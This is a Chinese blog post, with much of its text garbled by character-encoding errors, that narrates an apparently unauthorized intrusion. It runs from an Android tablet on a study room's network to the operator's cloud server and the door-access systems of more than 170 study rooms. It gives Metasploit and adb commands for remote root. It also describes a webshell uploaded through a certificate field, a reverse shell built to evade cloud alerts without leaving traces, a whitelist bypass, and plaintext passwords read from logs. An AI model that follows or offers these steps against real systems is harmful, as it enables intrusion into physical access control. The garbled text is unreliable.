对某自习室系统的一次渗透测试(从iot到getshell再到控制全国自习室)
前端時(shí)間找了個(gè)自習(xí)室學(xué)習(xí),因?yàn)樽粤?xí)室網(wǎng)絡(luò)不太好就無(wú)聊掃了一下網(wǎng)段,發(fā)現(xiàn)了一臺(tái)Ampak Technology機(jī)器
以為是筆記本電腦(自習(xí)室一般都是用手機(jī)比較多),就掃了一下詳細(xì)信息:
發(fā)現(xiàn)開了5555,之前對(duì)這個(gè)端口沒了解過(guò),就百度了一下發(fā)現(xiàn)是adb服務(wù),剛好看到一篇文章:
(https://www.cnblogs.com/guaishoujingling/p/11101649.html)
是打靶機(jī),不過(guò)看到說(shuō)是2016年的洞了,也沒想能利用成功,就msf用了一下:
search adb
use exploit/android/adb/adb_server_exec
設(shè)置目標(biāo)ip:
set RHOSTS 192.168.2.34
設(shè)置自己的ip:
set LHOST 192.168.2.136
我直接貼run的截圖了:
這里利用成功后是不返回shell的,要利用adb連接,安裝adb:
brew cask install android-platform-tools
安裝成功后連接目標(biāo):
adb connect 192.168.2.34:5555
adb devices 查看一下連接狀態(tài)是成功連接了:
adb shell直接遠(yuǎn)程命令執(zhí)行發(fā)現(xiàn)不是root權(quán)限,su成功拿到root權(quán)限:
截個(gè)圖看看:
adb shell screencap -p /sdcard/screen.png
通過(guò)adb漏洞實(shí)際已經(jīng)可以利用root來(lái)操控門禁系統(tǒng)了(比如kill掉服務(wù),清除鎖屏密碼等),但是這些操作會(huì)被自習(xí)室管理員知道,我想要通過(guò)遠(yuǎn)程在管理員不知道的情況下來(lái)操作門禁系統(tǒng)還是不行的...
繼續(xù)利用,通過(guò)手機(jī)平板上面的信息知道了用戶id是xxxxxx,還知道了平板是xx科技的,然后谷歌和掃描找到了xx科技的用戶管理登錄界面和api文檔。
知道了要實(shí)現(xiàn)操作門禁系統(tǒng)需要用戶apiid和apikey還要acsurl,這些信息都是登錄后要找的,通過(guò)爆破無(wú)果,找xx科技的客服要了測(cè)試賬號(hào)和密碼看了看后臺(tái)也沒有什么能利用的洞。
只能返回到平板,既然是通過(guò)網(wǎng)絡(luò)對(duì)接平板,平板上肯定有用戶信息。
通過(guò)抓取網(wǎng)絡(luò)數(shù)據(jù)包和查看安裝app包發(fā)現(xiàn)com.xxx.aidoor是xx科技對(duì)接門禁的app,
于是find了一下com.xxx.aidoor,找到了com.xxx.aidoor的數(shù)據(jù)庫(kù),在數(shù)據(jù)庫(kù)中并沒有找到api對(duì)接所需要的信息,但是找到了一個(gè)web網(wǎng)址:
通過(guò)這個(gè)地址繼續(xù)收集信息知道自習(xí)室系統(tǒng)的管理登錄界面和用戶登錄界面,掃了一下端口和信息,發(fā)現(xiàn)是阿里云的服務(wù)器,寶塔面板。
這里21,22的利用肯定是放到后面沒辦法了再回來(lái)搞,看了看svn也沒什么可以搞的,幾個(gè)頁(yè)面也沒什么信息,寶塔和think6.0.2,搜了下相關(guān)漏洞也沒什么能搞的,只能靠自己了。
在自習(xí)室系統(tǒng)的登錄界面(上面說(shuō)的xx科技登錄是iot設(shè)備的登錄界面)發(fā)現(xiàn)了可以找客戶要使用賬戶,于是加上客服微信要到了試用賬號(hào):
拿到后臺(tái)試用的能利用的漏洞,找到了xss和越權(quán),但是比較雞肋,利用困難,不是重點(diǎn)這里就不貼了,一直找啊找找啊找終于找到了一處上傳點(diǎn)不是傳到騰訊云儲(chǔ)存的,
因?yàn)楹笈_(tái)和美團(tuán)還有商戶微信對(duì)接,所以要上傳證書文件,可以直接改后綴上傳,傳了一個(gè)phpinfo看了一下
寶塔禁用的函數(shù)實(shí)在是太多了,加上阿里云會(huì)報(bào)警,
這里小技巧:
傳個(gè)過(guò)寶塔函數(shù)的免殺馬+python反彈shell可以避免阿里云報(bào)警成功無(wú)痕跡getshell
有了交互shell接下來(lái)的事情就好辦多了,find一下config找到了mysql信息:
這里發(fā)現(xiàn)用的是阿里云的rds數(shù)據(jù)庫(kù),站庫(kù)分離,我本地連接不上,推測(cè)是做了白名單限制,有了交互式shell白名單限制形同虛設(shè)好嘛~wget一份phpmyadmin過(guò)去,成功繞過(guò):
不過(guò)數(shù)據(jù)都是進(jìn)行加密的,連著查了幾條都解不開,推測(cè)是自寫加密。
這能難倒我?
滲透測(cè)試的本質(zhì)就是信息收集好吧,通過(guò)對(duì)服務(wù)器文件進(jìn)行信息收集發(fā)現(xiàn)在xxx文件夾下存放著用戶登錄的log,通過(guò)log可以直接查看用戶登錄的明文密碼:
成功拿到總管理賬號(hào),這套自習(xí)室系統(tǒng)的用戶還是不少的,全國(guó)170多家:
這個(gè)自習(xí)室管理系統(tǒng)是和我一開始adb漏洞利用的那個(gè)門禁平板的公司合作的,因?yàn)楹笈_(tái)對(duì)接了門禁系統(tǒng),所以可以直接在后臺(tái)通過(guò)對(duì)自習(xí)室管理看到門禁系統(tǒng)的賬號(hào)密碼,進(jìn)而可以遠(yuǎn)程控制全國(guó)170多家自習(xí)室的iot設(shè)備
完
?
總結(jié)
以上是生活随笔為你收集整理的对某自习室系统的一次渗透测试(从iot到getshell再到控制全国自习室)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 分析|CVE-2021-3156-sud
- 下一篇: 某公司邮件系统的安全检测